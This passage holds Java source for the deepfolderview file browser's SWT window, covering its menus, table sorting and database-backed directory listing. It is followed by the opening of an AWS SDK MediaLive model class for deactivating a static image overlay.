mntmCompressedFoldersVisible.setText(Messages.mntmCompressedFoldersVisible_text);
final MenuItem mntmCompressedFilesVisible = new MenuItem(menuVisibility, SWT.CHECK);
mntmCompressedFilesVisible.setSelection(true);
mntmCompressedFilesVisible.setText(Messages.mntmCompressedFilesVisible_text);
MenuItem mntmHelp = new MenuItem(menu, SWT.CASCADE);
mntmHelp.setText(Messages.mntmHelp_text);
Menu menuHelp = new Menu(mntmHelp);
mntmHelp.setMenu(menuHelp);
MenuItem mntmOpenSourceLicenses = new MenuItem(menuHelp, SWT.NONE);
mntmOpenSourceLicenses.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
new SwtOpenSourceLicenses(shell, SWT.TITLE|SWT.MIN|SWT.MAX|SWT.CLOSE).open();
}
});
mntmOpenSourceLicenses.setText(Messages.mntmOpenSourceLicenses_text);
compositeToolBar = new Composite(shell, SWT.NONE);
compositeToolBar.setLayoutData(new GridData(SWT.FILL, SWT.CENTER, true, false, 1, 1));
compositeToolBar.setBackground(SWTResourceManager.getColor(SWT.COLOR_WIDGET_BACKGROUND));
compositeToolBar.setFont(SWTResourceManager.getFont("Meiryo UI", 12, SWT.NORMAL));
GridLayout gl_compositeToolBar = new GridLayout(5, false);
gl_compositeToolBar.horizontalSpacing = 0;
gl_compositeToolBar.verticalSpacing = 0;
gl_compositeToolBar.marginWidth = 0;
gl_compositeToolBar.marginHeight = 0;
compositeToolBar.setLayout(gl_compositeToolBar);
formToolkit.adapt(compositeToolBar);
formToolkit.paintBordersFor(compositeToolBar);
Button btnLeft = new Button(compositeToolBar, SWT.NONE);
btnLeft.setImage(SWTResourceManager.getImage(SwtFileFolderMenu.class, "/com/github/n_i_e/deepfolderview/icon/go-previous.png"));
btnLeft.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
onNavigatePreviousSelected(e);
}
});
btnLeft.setFont(SWTResourceManager.getFont("Meiryo UI", 11, SWT.NORMAL));
formToolkit.adapt(btnLeft, true, true);
Button btnRight = new Button(compositeToolBar, SWT.NONE);
btnRight.setImage(SWTResourceManager.getImage(SwtFileFolderMenu.class, "/com/github/n_i_e/deepfolderview/icon/go-next.png"));
btnRight.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
onNavigateNextSelected(e);
}
});
btnRight.setFont(SWTResourceManager.getFont("Meiryo UI", 11, SWT.NORMAL));
formToolkit.adapt(btnRight, true, true);
Button btnUp = new Button(compositeToolBar, SWT.NONE);
btnUp.setImage(SWTResourceManager.getImage(SwtFileFolderMenu.class, "/com/github/n_i_e/deepfolderview/icon/go-up.png"));
btnUp.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
onUpperFolderSelected(e);
}
});
formToolkit.adapt(btnUp, true, true);
txtLocation = new Text(compositeToolBar, SWT.BORDER);
txtLocation.addModifyListener(new ModifyListener() {
public void modifyText(ModifyEvent arg0) {
onLocationModified(arg0);
}
});
GridData gd_txtLocation = new GridData(SWT.FILL, SWT.CENTER, true, false, 1, 1);
gd_txtLocation.widthHint = 200;
txtLocation.setLayoutData(gd_txtLocation);
txtLocation.setFont(SWTResourceManager.getFont("Meiryo UI", 11, SWT.NORMAL));
formToolkit.adapt(txtLocation, true, true);
Button btnRefresh = new Button(compositeToolBar, SWT.NONE);
btnRefresh.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
refresh();
}
});
btnRefresh.setImage(SWTResourceManager.getImage(SwtFileFolderMenu.class, "/com/github/n_i_e/deepfolderview/icon/view-refresh.png"));
formToolkit.adapt(btnRefresh, true, true);
final TableViewer tableViewer = new TableViewer(shell, SWT.MULTI | SWT.BORDER | SWT.FULL_SELECTION | SWT.VIRTUAL);
table = tableViewer.getTable();
table.setLayoutData(new GridData(SWT.FILL, SWT.FILL, true, true, 1, 1));
//table = new Table(scrolledComposite, SWT.BORDER | SWT.FULL_SELECTION | SWT.VIRTUAL);
table.setHeaderVisible(true);
table.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
onTableSelected(e);
}
@Override
public void widgetDefaultSelected(SelectionEvent e) {
onOpenSelected(e);
}
});
formToolkit.adapt(table);
formToolkit.paintBordersFor(table);
final TableColumn tblclmnPath = new TableColumn(table, SWT.LEFT);
tblclmnPath.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
table.setSortColumn(tblclmnPath);
if (table.getSortDirection() == SWT.UP) {
table.setSortDirection(SWT.DOWN);
} else {
table.setSortDirection(SWT.UP);
}
onTblclmnPathSelected(tblclmnPath, e);
}
});
tblclmnPath.setWidth(230);
tblclmnPath.setText(Messages.tblclmnPath_text);
setTableSortDirection(tblclmnPath, "path", order);
final TableColumn tblclmnDateLastModified = new TableColumn(table, SWT.LEFT);
tblclmnDateLastModified.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
table.setSortColumn(tblclmnDateLastModified);
if (table.getSortDirection() == SWT.UP) {
table.setSortDirection(SWT.DOWN);
} else {
table.setSortDirection(SWT.UP);
}
onTblclmnDateLastModifiedSelected(tblclmnDateLastModified, e);
}
});
tblclmnDateLastModified.setWidth(136);
tblclmnDateLastModified.setText(Messages.tblclmnDateLastModified_text);
setTableSortDirection(tblclmnDateLastModified, "datelastmodified", order);
final TableColumn tblclmnSize = new TableColumn(table, SWT.RIGHT);
tblclmnSize.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
table.setSortColumn(tblclmnSize);
if (table.getSortDirection() == SWT.UP) {
table.setSortDirection(SWT.DOWN);
} else {
table.setSortDirection(SWT.UP);
}
onTblclmnSizeSelected(tblclmnSize, e);
}
});
tblclmnSize.setWidth(110);
tblclmnSize.setText(Messages.tblclmnSize_text);
setTableSortDirection(tblclmnSize, "size", order);
final TableColumn tblclmnCompressedsize = new TableColumn(table, SWT.RIGHT);
tblclmnCompressedsize.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
table.setSortColumn(tblclmnCompressedsize);
if (table.getSortDirection() == SWT.UP) {
table.setSortDirection(SWT.DOWN);
} else {
table.setSortDirection(SWT.UP);
}
onTblclmnCompressedsizeSelected(tblclmnCompressedsize, e);
}
});
tblclmnCompressedsize.setWidth(110);
tblclmnCompressedsize.setText(Messages.tblclmnCompressedesize_text);
setTableSortDirection(tblclmnCompressedsize, "compressedsize", order);
final TableColumn tblclmnDuplicate = new TableColumn(table, SWT.NONE);
tblclmnDuplicate.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
table.setSortColumn(tblclmnDuplicate);
if (table.getSortDirection() == SWT.UP) {
table.setSortDirection(SWT.DOWN);
} else {
table.setSortDirection(SWT.UP);
}
onTblclmnDuplicateSelected(tblclmnDuplicate, e);
}
});
tblclmnDuplicate.setWidth(35);
tblclmnDuplicate.setText(Messages.tblclmnDuplicate_text);
setTableSortDirection(tblclmnDuplicate, "duplicate", order);
final TableColumn tblclmnDedupablesize = new TableColumn(table, SWT.RIGHT);
tblclmnDedupablesize.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
table.setSortColumn(tblclmnDedupablesize);
if (table.getSortDirection() == SWT.UP) {
table.setSortDirection(SWT.DOWN);
} else {
table.setSortDirection(SWT.UP);
}
onTblclmnDedupablesizeSelected(tblclmnDedupablesize, e);
}
});
tblclmnDedupablesize.setWidth(110);
tblclmnDedupablesize.setText(Messages.tblclmnDedupablesize_text);
setTableSortDirection(tblclmnDedupablesize, "dedupablesize", order);
Menu popupMenu = new Menu(table);
table.setMenu(popupMenu);
MenuItem mntmRun = new MenuItem(popupMenu, SWT.NONE);
mntmRun.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
onRunSelected();
}
});
mntmRun.setText(Messages.mntmRun_text);
MenuItem mntmOpen = new MenuItem(popupMenu, SWT.NONE);
mntmOpen.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
onOpenSelected(e);
}
});
mntmOpen.setText(Messages.mntmOpen_text);
MenuItem mntmOpenInNew = new MenuItem(popupMenu, SWT.NONE);
mntmOpenInNew.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
onOpenInNewWindowSelected(e);
}
});
mntmOpenInNew.setText(Messages.mntmOpenInNewWindow_text);
MenuItem mntmOpenDuplicateDetails = new MenuItem(popupMenu, SWT.NONE);
mntmOpenDuplicateDetails.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
onOpenDuplicateDetailsSelected(e);
}
});
mntmOpenDuplicateDetails.setText(Messages.mntmOpenDuplicateDetails_text);
MenuItem mntmCopyAsString = new MenuItem(popupMenu, SWT.NONE);
mntmCopyAsString.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
onCopyAsStringSelected();
}
});
mntmCopyAsString.setText(Messages.mntmCopyAsString_text);
MenuItem mntmCopyTo = new MenuItem(popupMenu, SWT.NONE);
mntmCopyTo.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
onCopyToSelected();
}
});
mntmCopyTo.setText(Messages.mntmCopyTo_text);
MenuItem menuItem = new MenuItem(popupMenu, SWT.SEPARATOR);
menuItem.setText("Visibility");
final MenuItem mntmFoldersVisible_1 = new MenuItem(popupMenu, SWT.CHECK);
mntmFoldersVisible_1.setSelection(true);
mntmFoldersVisible_1.setText(Messages.mntmFoldersVisible_text);
mntmFoldersVisible_1.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
mntmFoldersVisible.setSelection(mntmFoldersVisible_1.getSelection());
onFoldersVisibleChecked(mntmFoldersVisible.getSelection());
}
});
final MenuItem mntmFilesVisible_1 = new MenuItem(popupMenu, SWT.CHECK);
mntmFilesVisible_1.setSelection(true);
mntmFilesVisible_1.setText(Messages.mntmFilesVisible_text);
mntmFilesVisible_1.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
mntmFilesVisible.setSelection(mntmFilesVisible_1.getSelection());
onFilesVisibleChecked(mntmFilesVisible.getSelection());
}
});
final MenuItem mntmCompressedFoldersVisible_1 = new MenuItem(popupMenu, SWT.CHECK);
mntmCompressedFoldersVisible_1.setSelection(true);
mntmCompressedFoldersVisible_1.setText(Messages.mntmCompressedFoldersVisible_text);
mntmCompressedFoldersVisible_1.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
mntmCompressedFoldersVisible.setSelection(mntmCompressedFoldersVisible_1.getSelection());
onCompressedFoldersVisibleChecked(mntmCompressedFoldersVisible.getSelection());
}
});
final MenuItem mntmCompressedFilesVisible_1 = new MenuItem(popupMenu, SWT.CHECK);
mntmCompressedFilesVisible_1.setSelection(true);
mntmCompressedFilesVisible_1.setText(Messages.mntmCompressedFilesVisible_text);
mntmCompressedFilesVisible_1.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
mntmCompressedFilesVisible.setSelection(mntmCompressedFilesVisible_1.getSelection());
onCompressedFilesVisibleSelected(mntmCompressedFilesVisible.getSelection());
}
});
mntmFoldersVisible.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
mntmFoldersVisible_1.setSelection(mntmFoldersVisible.getSelection());
onFoldersVisibleChecked(mntmFoldersVisible.getSelection());
}
});
mntmFilesVisible.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
mntmFilesVisible_1.setSelection(mntmFilesVisible.getSelection());
onFilesVisibleChecked(mntmFilesVisible.getSelection());
}
});
mntmCompressedFoldersVisible.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
mntmCompressedFoldersVisible_1.setSelection(mntmCompressedFoldersVisible.getSelection());
onCompressedFoldersVisibleChecked(mntmCompressedFoldersVisible.getSelection());
}
});
mntmCompressedFilesVisible.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
mntmCompressedFilesVisible_1.setSelection(mntmCompressedFilesVisible.getSelection());
onCompressedFilesVisibleSelected(mntmCompressedFilesVisible.getSelection());
}
});
compositeStatusBar = new Composite(shell, SWT.NONE);
compositeStatusBar.setLayoutData(new GridData(SWT.FILL, SWT.CENTER, true, false, 1, 1));
compositeStatusBar.setBackground(SWTResourceManager.getColor(SWT.COLOR_WIDGET_BACKGROUND));
GridLayout gl_compositeStatusBar = new GridLayout(2, false);
gl_compositeStatusBar.marginWidth = 0;
gl_compositeStatusBar.marginHeight = 0;
compositeStatusBar.setLayout(gl_compositeStatusBar);
formToolkit.adapt(compositeStatusBar);
formToolkit.paintBordersFor(compositeStatusBar);
lblStatusBar = new Label(compositeStatusBar, SWT.NONE);
lblStatusBar.setLayoutData(new GridData(SWT.FILL, SWT.CENTER, true, false, 1, 1));
lblStatusBar.setBackground(SWTResourceManager.getColor(SWT.COLOR_WIDGET_BACKGROUND));
formToolkit.adapt(lblStatusBar, true, true);
lblStatusBar.setText("");
progressBar = new ProgressBar(compositeStatusBar, SWT.NONE);
formToolkit.adapt(progressBar, true, true);
m_bindingContext = initDataBindings();
}
/*
* event handlers
*/
protected void onCopyAsStringSelected() {
ArrayList<String> s = new ArrayList<String>();
for (PathEntry p: getSelectedPathEntries()) {
s.add(p.getPath());
}
StringSelection ss = new StringSelection(String.join("\n", s));
Clipboard clip = Toolkit.getDefaultToolkit().getSystemClipboard();
clip.setContents(ss, ss);
}
protected void onOpenSelected(SelectionEvent e) {
DBPathEntry entry = getSelectedPathEntry();
if (entry != null) {
setLocationAndRefresh(entry);
}
}
protected void onOpenInNewWindowSelected(SelectionEvent e) {
DBPathEntry p = getSelectedPathEntry();
if (p == null) {
p = location.get().getPathEntry();
}
if (p != null) {
new SwtFileFolderMenu().setLocationAndRefresh(p);
} else if (location.get().getPathString() != null) {
new SwtFileFolderMenu().setLocationAndRefresh(location.get().getPathString());
} else if (location.get().getSearchString() != null) {
new SwtFileFolderMenu().setLocationAndRefresh(location.get().getSearchString());
} else if (location.get().getPathId() != 0L) {
new SwtFileFolderMenu().setLocationAndRefresh(location.get().getPathId());
}
}
protected void onOpenDuplicateDetailsSelected(SelectionEvent e) {
DBPathEntry p = getSelectedPathEntry();
if (p == null) {
p = location.get().getPathEntry();
}
if (p != null) {
new SwtDuplicateMenu().setLocationAndRefresh(p);
} else if (location.get().getPathString() != null) {
new SwtDuplicateMenu().setLocationAndRefresh(location.get().getPathString());
} else if (location.get().getSearchString() != null) {
new SwtDuplicateMenu().setLocationAndRefresh(location.get().getSearchString());
} else if (location.get().getPathId() != 0L) {
new SwtDuplicateMenu().setLocationAndRefresh(location.get().getPathId());
}
}
protected void onNavigatePreviousSelected(SelectionEvent e) {
location.navigatePrevious();
setLocationAndRefresh(location.get());
}
protected void onNavigateNextSelected(SelectionEvent e) {
location.navigateNext();
setLocationAndRefresh(location.get());
}
protected void onUpperFolderSelected(SelectionEvent e) {
DBPathEntry p = location.get().getPathEntry();
if (p != null && p.getParentId() != 0L) {
setLocationAndRefresh(p.getParentId());
} else {
writeStatusBar("Not ready for going up operation; be patient.");
}
}
protected void onLocationModified(ModifyEvent arg0) {
String newstring = txtLocation.getText();
Assertion.assertNullPointerException(newstring != null);
writeStatusBar(String.format("New path string is: %s", newstring));
shell.setText(newstring);
Location oldloc = location.get();
if (newstring.equals(oldloc.getPathString())) {
// noop
} else if (newstring.equals(oldloc.getSearchString())) {
oldloc.setPathEntry(null);
oldloc.setPathId(0L);
oldloc.setPathString(null);
} else {
Location newloc = new Location();
newloc.setPathString(newstring);
location.add(newloc);
}
refresh();
}
protected void onTableSelected(SelectionEvent e) {}
private String order = PreferenceRW.getSwtFileFolderMenuSortOrder();
private boolean isFolderChecked = true;
private boolean isFileChecked = true;
private boolean isCompressedFolderChecked = true;
private boolean isCompressedFileChecked = true;
protected void onTblclmnPathSelected(TableColumn tblclmnPath, SelectionEvent e) {
if (table.getSortDirection() == SWT.UP) {
order = "path";
} else {
order = "path DESC";
}
PreferenceRW.setSwtFileFolderMenuSortOrder(order);
refresh();
}
protected void onTblclmnDateLastModifiedSelected(TableColumn tblclmnDateLastModified, SelectionEvent e) {
if (table.getSortDirection() == SWT.UP) {
order = "datelastmodified";
} else {
order = "datelastmodified DESC";
}
PreferenceRW.setSwtFileFolderMenuSortOrder(order);
refresh();
}
protected void onTblclmnSizeSelected(TableColumn tblclmnSize, SelectionEvent e) {
if (table.getSortDirection() == SWT.UP) {
order = "size";
} else {
order = "size DESC";
}
PreferenceRW.setSwtFileFolderMenuSortOrder(order);
refresh();
}
protected void onTblclmnCompressedsizeSelected(TableColumn tblclmnCompressedesize, SelectionEvent e) {
if (table.getSortDirection() == SWT.UP) {
order = "compressedsize";
} else {
order = "compressedsize DESC";
}
PreferenceRW.setSwtFileFolderMenuSortOrder(order);
refresh();
}
protected void onTblclmnDuplicateSelected(TableColumn tblclmnDuplicate, SelectionEvent e) {
if (table.getSortDirection() == SWT.UP) {
order = "duplicate";
} else {
order = "duplicate DESC";
}
PreferenceRW.setSwtFileFolderMenuSortOrder(order);
refresh();
}
protected void onTblclmnDedupablesizeSelected(TableColumn tblclmnDedupablesize, SelectionEvent e) {
if (table.getSortDirection() == SWT.UP) {
order = "dedupablesize";
} else {
order = "dedupablesize DESC";
}
PreferenceRW.setSwtFileFolderMenuSortOrder(order);
refresh();
}
protected void onFoldersVisibleChecked(boolean checked) {
isFolderChecked = checked;
refresh();
}
protected void onFilesVisibleChecked(boolean checked) {
isFileChecked = checked;
refresh();
}
protected void onCompressedFoldersVisibleChecked(boolean checked) {
isCompressedFolderChecked = checked;
refresh();
}
protected void onCompressedFilesVisibleSelected(boolean checked) {
isCompressedFileChecked = checked;
refresh();
}
public void setLocationAndRefresh(final String text) {
Display.getDefault().asyncExec(new Runnable() {
public void run() {
txtLocation.setText(text); // onLocationModified() is automatically called here.
}
});
}
/*
* setLocationAndRefresh and related
*/
public void setLocationAndRefresh(final DBPathEntry entry) {
Assertion.assertNullPointerException(entry != null);
Assertion.assertNullPointerException(location != null);
Location oldloc = location.get();
if (oldloc.getPathEntry() != null && oldloc.getPathEntry().getPathId() == entry.getPathId()) {
// noop
} else if (oldloc.getPathString() != null && oldloc.getPathString().equals(entry.getPath())) {
oldloc.setPathEntry(entry);
oldloc.setPathId(entry.getPathId());
} else {
Location newloc = new Location();
newloc.setPathEntry(entry);
newloc.setPathId(entry.getPathId());
newloc.setPathString(entry.getPath());
location.add(newloc);
}
setLocationAndRefresh(entry.getPath());
}
public void setLocationAndRefresh(long id) {
writeStatusBar(String.format("Starting query; new ID is: %d", id));
Location oldloc = location.get();
if (oldloc.getPathId() == id) {
			// noop
} else {
Location newloc = new Location();
newloc.setPathId(id);
location.add(newloc);
}
refresh(new LazyRunnable() {
@Override
public void run() throws SQLException, InterruptedException {
Debug.writelog("-- SwtFileFolderMenu SetLocationAndRefresh LOCAL PATTERN (id based) --");
Location loc = location.get();
DBPathEntry p = getDB().getDBPathEntryByPathId(loc.getPathId());
if (p != null) {
loc.setPathEntry(p);
loc.setPathString(p.getPath());
loc.setSearchString(null);
setLocationAndRefresh(loc.getPathString());
}
}
});
}
public void setLocationAndRefresh(final Location loc) {
if (loc.getPathString() != null) {
setLocationAndRefresh(loc.getPathString());
} else if (loc.getPathEntry() != null) {
setLocationAndRefresh(loc.getPathEntry().getPath());
} else if (loc.getSearchString() != null) {
setLocationAndRefresh(loc.getSearchString());
} else {
setLocationAndRefresh("");
}
}
/*
* normal refresh
*/
private Scenario scenario = new Scenario();
protected synchronized void refresh() {
refresh(scenario);
}
class Scenario extends SwtCommonFileFolderMenu.Scenario {
@Override
public void run() throws SQLException, InterruptedException {
writeProgress(10);
Location loc = location.get();
if (loc.getPathEntry() == null && loc.getSearchString() == null &&
(loc.getPathEntry() != null || loc.getPathId() != 0L
|| (loc.getPathString() != null && !"".equals(loc.getPathString())))) {
writeProgress(50);
if (loc.getPathString() != null) {
DBPathEntry p = getDB().getDBPathEntryByPath(loc.getPathString());
if (p != null) {
loc.setPathEntry(p);
loc.setPathId(p.getPathId());
Debug.writelog("-- SwtFileFolderMenu PREPROCESS PATTERN 1 (path based entry detection) --");
} else {
loc.setSearchString(loc.getPathString());
loc.setPathString(null);
loc.setPathId(0L);
loc.setPathEntry(null);
Debug.writelog("-- SwtFileFolderMenu PREPROCESS PATTERN 2 (searchstring=" + loc.getSearchString() + ") --");
}
} else if (loc.getPathId() != 0L) {
Debug.writelog("-- SwtFileFolderMenu PREPROCESS PATTERN 3 (id based) --");
DBPathEntry p = getDB().getDBPathEntryByPathId(loc.getPathId());
assert(p != null);
setLocationAndRefresh(p);
return;
} else {
Debug.writelog("-- SwtFileFolderMenu PREPROCESS PATTERN 4 (show all paths) --");
}
}
try {
threadWait();
cleanupTable();
ArrayList<String> typelist = new ArrayList<String> ();
if (isFolderChecked) {
typelist.add("type=0");
}
if (isFileChecked) {
typelist.add("type=1");
}
if (isCompressedFolderChecked) {
typelist.add("type=2");
}
if (isCompressedFileChecked) {
typelist.add("type=3");
}
				String typeWhere = typelist.size() == 0 ? "1=0" : String.join(" OR ", typelist); // "1=0": nothing checked matches nothing; an empty "()" would be invalid SQL
threadWait();
writeStatusBar("Querying...");
writeProgress(70);
String searchSubSQL;
ArrayList<String> searchStringElement = new ArrayList<String> ();
if (loc.getSearchString() == null || "".equals(loc.getSearchString())) {
searchSubSQL = "";
} else {
ArrayList<String> p = new ArrayList<String> ();
for (String s: loc.getSearchString().split(" ")) {
if (! "".equals(s)) {
p.add("path LIKE ?");
searchStringElement.add(s);
}
}
searchSubSQL = " AND (" + String.join(" AND ", p) + ")";
}
threadWait();
DBPathEntry locationPathEntry = null;
PreparedStatement ps;
if (loc.getPathString() == null || "".equals(loc.getPathString())) {
String sql = "SELECT * FROM directory AS d1 WHERE (" + typeWhere + ") " + searchSubSQL
+ " AND (parentid=0 OR EXISTS (SELECT * FROM directory AS d2 WHERE d1.parentid=d2.pathid))"
+ " ORDER BY " + order;
Debug.writelog(sql);
ps = getDB().prepareStatement(sql);
int c = 1;
for (String s: searchStringElement) {
ps.setString(c, "%" + s + "%");
Debug.writelog(c + " %" + s + "%");
c++;
}
} else if ((locationPathEntry = loc.getPathEntry()) != null) {
String sql = "SELECT * FROM directory AS d1 WHERE (" + typeWhere + ") " + searchSubSQL
+ " AND (pathid=? OR EXISTS (SELECT * FROM upperlower WHERE upper=? AND lower=pathid))"
+ " AND (parentid=0 OR EXISTS (SELECT * FROM directory AS d2 WHERE d1.parentid=d2.pathid))"
+ " ORDER BY " + order;
Debug.writelog(sql);
ps = getDB().prepareStatement(sql);
int c = 1;
for (String s: searchStringElement) {
ps.setString(c, "%" + s + "%");
Debug.writelog(c + " %" + s + "%");
c++;
}
ps.setLong(c++, locationPathEntry.getPathId());
ps.setLong(c++, locationPathEntry.getPathId());
Debug.writelog(locationPathEntry.getPath());
} else {
String sql = "SELECT * FROM directory AS d1 WHERE (" + typeWhere + ") " + searchSubSQL
+ " AND path LIKE ?"
+ " AND (parentid=0 OR EXISTS (SELECT * FROM directory AS d2 WHERE d1.parentid=d2.pathid))"
+ " ORDER BY " + order;
Debug.writelog(sql);
ps = getDB().prepareStatement(sql);
int c = 1;
for (String s: searchStringElement) {
ps.setString(c, "%" + s + "%");
Debug.writelog(c + " %" + s + "%");
c++;
}
ps.setString(c++, loc.getPathString() + "%");
Debug.writelog(loc.getPathString());
}
try {
LazyUpdater.Dispatcher disp = getDB().getDispatcher();
disp.setList(Dispatcher.NONE);
disp.setCsum(Dispatcher.NONE);
ResultSet rs = ps.executeQuery();
try {
threadWait();
Debug.writelog("QUERY FINISHED");
writeStatusBar("Listing...");
writeProgress(90);
int count = 0;
while (rs.next()) {
threadWait();
DBPathEntry p1 = getDB().rsToPathEntry(rs);
Assertion.assertAssertionError(p1 != null);
Assertion.assertAssertionError(p1.getPath() != null);
if (locationPathEntry != null) {
Assertion.assertAssertionError(locationPathEntry.getPath() != null);
Assertion.assertAssertionError(p1.getPath().startsWith(locationPathEntry.getPath()),
p1.getPath() + " does not start with " + locationPathEntry.getPath()
);
}
PathEntry p2;
try {
p2 = disp.dispatch(p1);
} catch (IOException e) {
p2 = null;
}
if (p2 == null) {
addRow(p1, rs.getInt("duplicate"), rs.getLong("dedupablesize"), true);
getDB().unsetClean(p1.getParentId());
} else {
Assertion.assertAssertionError(p1.getPath().equals(p2.getPath()),
"!! " + p1.getPath() + " != " + p2.getPath());
if (!PathEntry.dscMatch(p1, p2)) {
p1.setDateLastModified(p2.getDateLastModified());
p1.setSize(p2.getSize());
p1.setCompressedSize(p2.getCompressedSize());
p1.clearCsum();
getDB().unsetClean(p1.getParentId());
}
addRow(p1, rs.getInt("duplicate"), rs.getLong("dedupablesize"), false);
}
count ++;
}
writeStatusBar(String.format("%d items", count));
} finally {
rs.close();
}
} finally {
ps.close();
}
writeProgress(0);
} catch (WindowDisposedException e) {}
}
protected void cleanupTable() throws WindowDisposedException {
if (table.isDisposed()) {
throw new WindowDisposedException("!! Window disposed at cleanupTable");
}
Display.getDefault().asyncExec(new Runnable() {
public void run() {
pathentrylist.clear();
				table.removeAll();
}
});
}
protected void addRow(final DBPathEntry entry, final int duplicate,
final long dedupablesize, final boolean grayout) throws WindowDisposedException {
if (table.isDisposed()) {
throw new WindowDisposedException("!! Window disposed at addRow");
}
Display.getDefault().asyncExec(new Runnable() {
public void run() {
pathentrylist.add(entry);
final SimpleDateFormat sdf = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
final NumberFormat numf = NumberFormat.getNumberInstance();
Date d = new Date(entry.getDateLastModified());
String[] row = {
entry.getPath(),
sdf.format(d),
numf.format(entry.getSize()),
numf.format(entry.getCompressedSize()),
(duplicate > 0 ? numf.format(duplicate) : null),
(dedupablesize > 0 ? numf.format(dedupablesize) : null),
};
final Display display = Display.getDefault();
final Color blue = new Color(display, 0, 0, 255);
final Color red = new Color(display, 255, 0, 0);
final Color black = new Color(display, 0, 0, 0);
final Color gray = new Color(display, 127, 127, 127);
try {
TableItem tableItem = new TableItem(table, SWT.NONE);
tableItem.setText(row);
if (grayout) {
tableItem.setForeground(gray);
} else if (entry.isNoAccess()) {
tableItem.setForeground(red);
} else if (entry.isFile() && entry.getSize() != entry.getCompressedSize()) {
tableItem.setForeground(blue);
} else {
tableItem.setForeground(black);
}
} catch (Exception e) {
if (!table.isDisposed()) {
e.printStackTrace();
}
}
}
});
}
}
protected DataBindingContext initDataBindings() {
DataBindingContext bindingContext = new DataBindingContext();
//
IObservableValue observeBackgroundCompositeObserveWidget = WidgetProperties.background().observe(compositeToolBar);
IObservableValue backgroundShellObserveValue = PojoProperties.value("background").observe(shell);
bindingContext.bindValue(observeBackgroundCompositeObserveWidget, backgroundShellObserveValue, null, null);
//
IObservableValue observeBackgroundLblStatusBarObserveWidget = WidgetProperties.background().observe(lblStatusBar);
bindingContext.bindValue(observeBackgroundLblStatusBarObserveWidget, backgroundShellObserveValue, null, null);
//
IObservableValue observeBackgroundCompositeStatusBarObserveWidget = WidgetProperties.background().observe(compositeStatusBar);
bindingContext.bindValue(observeBackgroundCompositeStatusBarObserveWidget, backgroundShellObserveValue, null, null);
//
return bindingContext;
}
}
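/*
 * Usage sketch (illustration only, not part of the original class): opening a new
 * browser window at a given path string, mirroring what onOpenInNewWindowSelected()
 * above does for the current selection.
 */
class SwtFileFolderMenuUsageExample {
	static void openAt(String pathString) {
		new SwtFileFolderMenu().setLocationAndRefresh(pathString);
	}
}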
| n-i-e/deepfolderview | src/main/java/com/github/n_i_e/deepfolderview/SwtFileFolderMenu.java | Java | apache-2.0 | 41,340 |
/*
* Copyright 2014-2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance with
* the License. A copy of the License is located at
*
* http://aws.amazon.com/apache2.0
*
* or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
* CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions
* and limitations under the License.
*/
package com.amazonaws.services.medialive.model;
import java.io.Serializable;
import javax.annotation.Generated;
import com.amazonaws.protocol.StructuredPojo;
import com.amazonaws.protocol.ProtocolMarshaller;
/**
* Settings for the action to deactivate the image in a specific layer.
*
* @see <a
* href="http://docs.aws.amazon.com/goto/WebAPI/medialive-2017-10-14/StaticImageDeactivateScheduleActionSettings"
* target="_top">AWS API Documentation</a>
*/
@Generated("com.amazonaws:aws-java-sdk-code-generator")
public class StaticImageDeactivateScheduleActionSettings implements Serializable, Cloneable, StructuredPojo {
/** The time in milliseconds for the image to fade out. Default is 0 (no fade-out). */
private Integer fadeOut;
/** The image overlay layer to deactivate, 0 to 7. Default is 0. */
private Integer layer;
/**
* The time in milliseconds for the image to fade out. Default is 0 (no fade-out).
*
* @param fadeOut
* The time in milliseconds for the image to fade out. Default is 0 (no fade-out).
*/
public void setFadeOut(Integer fadeOut) {
this.fadeOut = fadeOut;
}
/**
* The time in milliseconds for the image to fade out. Default is 0 (no fade-out).
*
* @return The time in milliseconds for the image to fade out. Default is 0 (no fade-out).
*/
public Integer getFadeOut() {
return this.fadeOut;
}
/**
* The time in milliseconds for the image to fade out. Default is 0 (no fade-out).
*
* @param fadeOut
* The time in milliseconds for the image to fade out. Default is 0 (no fade-out).
* @return Returns a reference to this object so that method calls can be chained together.
*/
